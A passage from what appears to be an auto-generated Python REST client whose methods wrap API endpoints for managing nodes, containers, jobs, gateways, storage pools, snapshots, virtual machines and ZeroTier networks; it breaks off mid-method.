It is method for GET /nodes/{nodeid}/containers/{containername}/info
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/info"
return self.client.get(uri, None, headers, query_params, content_type)
def KillContainerJob(self, jobid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kills the job
It is method for DELETE /nodes/{nodeid}/containers/{containername}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs/"+jobid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetContainerJob(self, jobid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get details of a submitted job on the container
It is method for GET /nodes/{nodeid}/containers/{containername}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs/"+jobid
return self.client.get(uri, None, headers, query_params, content_type)
def SendSignalToJob(self, data, jobid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Send signal to the job
It is method for POST /nodes/{nodeid}/containers/{containername}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs/"+jobid
return self.client.post(uri, data, headers, query_params, content_type)
def KillAllContainerJobs(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kill all running jobs on the container
It is method for DELETE /nodes/{nodeid}/containers/{containername}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs"
return self.client.delete(uri, None, headers, query_params, content_type)
def ListContainerJobs(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running jobs on the container
It is method for GET /nodes/{nodeid}/containers/{containername}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs"
return self.client.get(uri, None, headers, query_params, content_type)
def StartContainerJob(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Start a new job in this container
It is method for POST /nodes/{nodeid}/containers/{containername}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/jobs"
return self.client.post(uri, data, headers, query_params, content_type)
def GetContainerMemInfo(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information about the memory in the container
It is method for GET /nodes/{nodeid}/containers/{containername}/mem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/mem"
return self.client.get(uri, None, headers, query_params, content_type)
def GetContainerNicInfo(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information about the network interfaces in the container
It is method for GET /nodes/{nodeid}/containers/{containername}/nics
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/nics"
return self.client.get(uri, None, headers, query_params, content_type)
def PingContainer(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Ping this container
It is method for POST /nodes/{nodeid}/containers/{containername}/ping
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/ping"
return self.client.post(uri, data, headers, query_params, content_type)
def KillContainerProcess(self, processid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kills the process by sending sigterm signal to the process. If it is still running, a sigkill signal will be sent to the process
It is method for DELETE /nodes/{nodeid}/containers/{containername}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/processes/"+processid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetContainerProcess(self, processid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get process details
It is method for GET /nodes/{nodeid}/containers/{containername}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/processes/"+processid
return self.client.get(uri, None, headers, query_params, content_type)
def SendSignalToProcess(self, data, processid, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Send signal to the process
It is method for POST /nodes/{nodeid}/containers/{containername}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/processes/"+processid
return self.client.post(uri, data, headers, query_params, content_type)
def ListContainerProcesses(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get running processes in this container
It is method for GET /nodes/{nodeid}/containers/{containername}/processes
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/processes"
return self.client.get(uri, None, headers, query_params, content_type)
def StartContainer(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Start container instance
It is method for POST /nodes/{nodeid}/containers/{containername}/start
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/start"
return self.client.post(uri, data, headers, query_params, content_type)
def GetContainerState(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get aggregated consumption of container + all processes (CPU, memory, etc.)
It is method for GET /nodes/{nodeid}/containers/{containername}/state
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/state"
return self.client.get(uri, None, headers, query_params, content_type)
def StopContainer(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Stop container instance
It is method for POST /nodes/{nodeid}/containers/{containername}/stop
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername+"/stop"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteContainer(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete container instance
It is method for DELETE /nodes/{nodeid}/containers/{containername}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername
return self.client.delete(uri, None, headers, query_params, content_type)
def GetContainer(self, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get container
It is method for GET /nodes/{nodeid}/containers/{containername}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername
return self.client.get(uri, None, headers, query_params, content_type)
def UpdateContainer(self, data, containername, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Updates the container Nic
It is method for PUT /nodes/{nodeid}/containers/{containername}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers/"+containername
return self.client.put(uri, data, headers, query_params, content_type)
def ListContainers(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running containers
It is method for GET /nodes/{nodeid}/containers
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateContainer(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new container
It is method for POST /nodes/{nodeid}/containers
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/containers"
return self.client.post(uri, data, headers, query_params, content_type)
def GetCPUInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of all CPUs in the node
It is method for GET /nodes/{nodeid}/cpus
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/cpus"
return self.client.get(uri, None, headers, query_params, content_type)
def GetDiskInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of all the disks in the node
It is method for GET /nodes/{nodeid}/disks
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/disks"
return self.client.get(uri, None, headers, query_params, content_type)
def GetGWFWConfig(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get current FW config
It is method for GET /nodes/{nodeid}/gws/{gwname}/advanced/firewall
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/advanced/firewall"
return self.client.get(uri, None, headers, query_params, content_type)
def SetGWFWConfig(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Set FW config
Once used you can not use gw.portforwards any longer
It is method for POST /nodes/{nodeid}/gws/{gwname}/advanced/firewall
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/advanced/firewall"
return self.client.post(uri, data, headers, query_params, content_type)
def GetGWHTTPConfig(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get current HTTP config
It is method for GET /nodes/{nodeid}/gws/{gwname}/advanced/http
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/advanced/http"
return self.client.get(uri, None, headers, query_params, content_type)
def SetGWHTTPConfig(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Set HTTP config
Once used you can not use gw.httpproxies any longer
It is method for POST /nodes/{nodeid}/gws/{gwname}/advanced/http
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/advanced/http"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteDHCPHost(self, macaddress, interface, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete dhcp host
It is method for DELETE /nodes/{nodeid}/gws/{gwname}/dhcp/{interface}/hosts/{macaddress}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/dhcp/"+interface+"/hosts/"+macaddress
return self.client.delete(uri, None, headers, query_params, content_type)
def ListGWDHCPHosts(self, interface, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List DHCPHosts for specified interface
It is method for GET /nodes/{nodeid}/gws/{gwname}/dhcp/{interface}/hosts
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/dhcp/"+interface+"/hosts"
return self.client.get(uri, None, headers, query_params, content_type)
def AddGWDHCPHost(self, data, interface, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Add a dhcp host to a specified interface
It is method for POST /nodes/{nodeid}/gws/{gwname}/dhcp/{interface}/hosts
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/dhcp/"+interface+"/hosts"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteGWForward(self, forwardid, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete portforward, forwardid = srcip:srcport
It is method for DELETE /nodes/{nodeid}/gws/{gwname}/firewall/forwards/{forwardid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/firewall/forwards/"+forwardid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetGWForwards(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get list for IPv4 Forwards
It is method for GET /nodes/{nodeid}/gws/{gwname}/firewall/forwards
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/firewall/forwards"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateGWForwards(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new Portforwarding
It is method for POST /nodes/{nodeid}/gws/{gwname}/firewall/forwards
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/firewall/forwards"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteHTTPProxies(self, proxyid, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete HTTP proxy
It is method for DELETE /nodes/{nodeid}/gws/{gwname}/httpproxies/{proxyid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/httpproxies/"+proxyid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetHTTPProxy(self, proxyid, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get info of HTTP proxy
It is method for GET /nodes/{nodeid}/gws/{gwname}/httpproxies/{proxyid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/httpproxies/"+proxyid
return self.client.get(uri, None, headers, query_params, content_type)
def ListHTTPProxies(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List for HTTP proxies
It is method for GET /nodes/{nodeid}/gws/{gwname}/httpproxies
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/httpproxies"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateHTTPProxies(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create new HTTP proxies
It is method for POST /nodes/{nodeid}/gws/{gwname}/httpproxies
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/httpproxies"
return self.client.post(uri, data, headers, query_params, content_type)
def MigrateGateway(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Migrate Gateway
It is method for POST /nodes/{nodeid}/gws/{gwname}/migrate
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/migrate"
return self.client.post(uri, data, headers, query_params, content_type)
def StartGateway(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Start Gateway instance
It is method for POST /nodes/{nodeid}/gws/{gwname}/start
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/start"
return self.client.post(uri, data, headers, query_params, content_type)
def StopGateway(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Stop gateway instance
It is method for POST /nodes/{nodeid}/gws/{gwname}/stop
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname+"/stop"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteGateway(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete gateway instance
It is method for DELETE /nodes/{nodeid}/gws/{gwname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetGateway(self, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get gateway
It is method for GET /nodes/{nodeid}/gws/{gwname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname
return self.client.get(uri, None, headers, query_params, content_type)
def UpdateGateway(self, data, gwname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Update Gateway
It is method for PUT /nodes/{nodeid}/gws/{gwname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws/"+gwname
return self.client.put(uri, data, headers, query_params, content_type)
def ListGateways(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running gateways
It is method for GET /nodes/{nodeid}/gws
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateGW(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new gateway
It is method for POST /nodes/{nodeid}/gws
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/gws"
return self.client.post(uri, data, headers, query_params, content_type)
def GetNodeOSInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of the OS of the node
It is method for GET /nodes/{nodeid}/info
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/info"
return self.client.get(uri, None, headers, query_params, content_type)
def KillNodeJob(self, jobid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kills the job
It is method for DELETE /nodes/{nodeid}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/jobs/"+jobid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetNodeJob(self, jobid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get the details of a submitted job
It is method for GET /nodes/{nodeid}/jobs/{jobid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/jobs/"+jobid
return self.client.get(uri, None, headers, query_params, content_type)
def KillAllNodeJobs(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kill all running jobs
It is method for DELETE /nodes/{nodeid}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/jobs"
return self.client.delete(uri, None, headers, query_params, content_type)
def ListNodeJobs(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running jobs
It is method for GET /nodes/{nodeid}/jobs
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/jobs"
return self.client.get(uri, None, headers, query_params, content_type)
def GetMemInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information about the memory in the node
It is method for GET /nodes/{nodeid}/mem
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/mem"
return self.client.get(uri, None, headers, query_params, content_type)
def GetNodeMounts(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of all the mountpoints on the node
It is method for GET /nodes/{nodeid}/mounts
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/mounts"
return self.client.get(uri, None, headers, query_params, content_type)
def GetNicInfo(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information about the network interfaces in the node
It is method for GET /nodes/{nodeid}/nics
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/nics"
return self.client.get(uri, None, headers, query_params, content_type)
def PingNode(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Ping this node
It is method for POST /nodes/{nodeid}/ping
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/ping"
return self.client.post(uri, data, headers, query_params, content_type)
def KillNodeProcess(self, processid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Kills the process by sending a SIGTERM signal. If it is still running, a SIGKILL signal will be sent to the process
It is method for DELETE /nodes/{nodeid}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/processes/"+processid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetNodeProcess(self, processid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get process details
It is method for GET /nodes/{nodeid}/processes/{processid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/processes/"+processid
return self.client.get(uri, None, headers, query_params, content_type)
def ListNodeProcesses(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get processes
It is method for GET /nodes/{nodeid}/processes
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/processes"
return self.client.get(uri, None, headers, query_params, content_type)
def RebootNode(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Immediately reboot the machine
It is method for POST /nodes/{nodeid}/reboot
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/reboot"
return self.client.post(uri, data, headers, query_params, content_type)
def GetNodeState(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
The aggregated consumption of node + all processes (cpu, memory, etc...)
It is method for GET /nodes/{nodeid}/state
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/state"
return self.client.get(uri, None, headers, query_params, content_type)
def GetStats(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get all statskeys of the node
It is method for GET /nodes/{nodeid}/stats
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/stats"
return self.client.get(uri, None, headers, query_params, content_type)
def DeleteStoragePoolDevice(self, deviceuuid, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Removes the device from the storage pool
It is method for DELETE /nodes/{nodeid}/storagepools/{storagepoolname}/devices/{deviceuuid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/devices/"+deviceuuid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetStoragePoolDeviceInfo(self, deviceuuid, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get information of the device
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/devices/{deviceuuid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/devices/"+deviceuuid
return self.client.get(uri, None, headers, query_params, content_type)
def ListStoragePoolDevices(self, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List the devices in the storage pool
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/devices
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/devices"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateStoragePoolDevices(self, data, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Add extra devices to this storage pool
It is method for POST /nodes/{nodeid}/storagepools/{storagepoolname}/devices
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/devices"
return self.client.post(uri, data, headers, query_params, content_type)
def RollbackFilesystemSnapshot(self, data, snapshotname, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Rollback the file system to the state at the moment the snapshot was taken
It is method for POST /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots/{snapshotname}/rollback
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots/"+snapshotname+"/rollback"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteFilesystemSnapshot(self, snapshotname, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete snapshot
It is method for DELETE /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots/{snapshotname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots/"+snapshotname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetFilesystemSnapshotInfo(self, snapshotname, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information on the snapshot
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots/{snapshotname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots/"+snapshotname
return self.client.get(uri, None, headers, query_params, content_type)
def ListFilesystemSnapshots(self, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List snapshots of this file system
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateSnapshot(self, data, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new read-only snapshot of the current state of the file system
It is method for POST /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}/snapshots
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname+"/snapshots"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteFilesystem(self, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete file system
It is method for DELETE /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetFilesystemInfo(self, filesystemname, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed file system information
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems/{filesystemname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems/"+filesystemname
return self.client.get(uri, None, headers, query_params, content_type)
def ListFilesystems(self, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List all file systems
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateFilesystem(self, data, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new file system
It is method for POST /nodes/{nodeid}/storagepools/{storagepoolname}/filesystems
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname+"/filesystems"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteStoragePool(self, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Delete the storage pool
It is method for DELETE /nodes/{nodeid}/storagepools/{storagepoolname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname
return self.client.delete(uri, None, headers, query_params, content_type)
def GetStoragePoolInfo(self, storagepoolname, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get detailed information of this storage pool
It is method for GET /nodes/{nodeid}/storagepools/{storagepoolname}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools/"+storagepoolname
return self.client.get(uri, None, headers, query_params, content_type)
def ListStoragePools(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List storage pools present in the node
It is method for GET /nodes/{nodeid}/storagepools
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateStoragePool(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Create a new storage pool in the node
It is method for POST /nodes/{nodeid}/storagepools
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/storagepools"
return self.client.post(uri, data, headers, query_params, content_type)
def ImportVM(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Import the virtual machine from ftp server
It is method for POST /nodes/{nodeid}/vms/import
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/import"
return self.client.post(uri, data, headers, query_params, content_type)
def ExportVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Export the virtual machine to ftp server
It is method for POST /nodes/{nodeid}/vms/{vmid}/export
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/export"
return self.client.post(uri, data, headers, query_params, content_type)
def GetVMInfo(self, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get statistical information about the virtual machine.
It is method for GET /nodes/{nodeid}/vms/{vmid}/info
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/info"
return self.client.get(uri, None, headers, query_params, content_type)
def MigrateVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Migrate the virtual machine to another host
It is method for POST /nodes/{nodeid}/vms/{vmid}/migrate
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/migrate"
return self.client.post(uri, data, headers, query_params, content_type)
def PauseVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Pauses the VM
It is method for POST /nodes/{nodeid}/vms/{vmid}/pause
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/pause"
return self.client.post(uri, data, headers, query_params, content_type)
def ResumeVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Resumes the virtual machine
It is method for POST /nodes/{nodeid}/vms/{vmid}/resume
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/resume"
return self.client.post(uri, data, headers, query_params, content_type)
def ShutdownVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Gracefully shutdown the virtual machine
It is method for POST /nodes/{nodeid}/vms/{vmid}/shutdown
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/shutdown"
return self.client.post(uri, data, headers, query_params, content_type)
def StartVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Start the virtual machine
It is method for POST /nodes/{nodeid}/vms/{vmid}/start
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/start"
return self.client.post(uri, data, headers, query_params, content_type)
def StopVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Stops the VM
It is method for POST /nodes/{nodeid}/vms/{vmid}/stop
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid+"/stop"
return self.client.post(uri, data, headers, query_params, content_type)
def DeleteVM(self, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Deletes the virtual machine
It is method for DELETE /nodes/{nodeid}/vms/{vmid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetVM(self, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get the virtual machine object
It is method for GET /nodes/{nodeid}/vms/{vmid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid
return self.client.get(uri, None, headers, query_params, content_type)
def UpdateVM(self, data, vmid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Updates the virtual machine
It is method for PUT /nodes/{nodeid}/vms/{vmid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms/"+vmid
return self.client.put(uri, data, headers, query_params, content_type)
def ListVMs(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List all virtual machines
It is method for GET /nodes/{nodeid}/vms
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms"
return self.client.get(uri, None, headers, query_params, content_type)
def CreateVM(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Creates a new virtual machine
It is method for POST /nodes/{nodeid}/vms
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/vms"
return self.client.post(uri, data, headers, query_params, content_type)
def ExitZerotier(self, zerotierid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Exit the ZeroTier network
It is method for DELETE /nodes/{nodeid}/zerotiers/{zerotierid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/zerotiers/"+zerotierid
return self.client.delete(uri, None, headers, query_params, content_type)
def GetZerotier(self, zerotierid, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Get ZeroTier network details
It is method for GET /nodes/{nodeid}/zerotiers/{zerotierid}
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/zerotiers/"+zerotierid
return self.client.get(uri, None, headers, query_params, content_type)
def ListZerotier(self, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
List running ZeroTier networks
It is method for GET /nodes/{nodeid}/zerotiers
"""
uri = self.client.base_url + "/nodes/"+nodeid+"/zerotiers"
return self.client.get(uri, None, headers, query_params, content_type)
def JoinZerotier(self, data, nodeid, headers=None, query_params=None, content_type="application/json"):
"""
Join ZeroTier network
It is method for POST /nodes/{nodeid}/zerotiers
"""
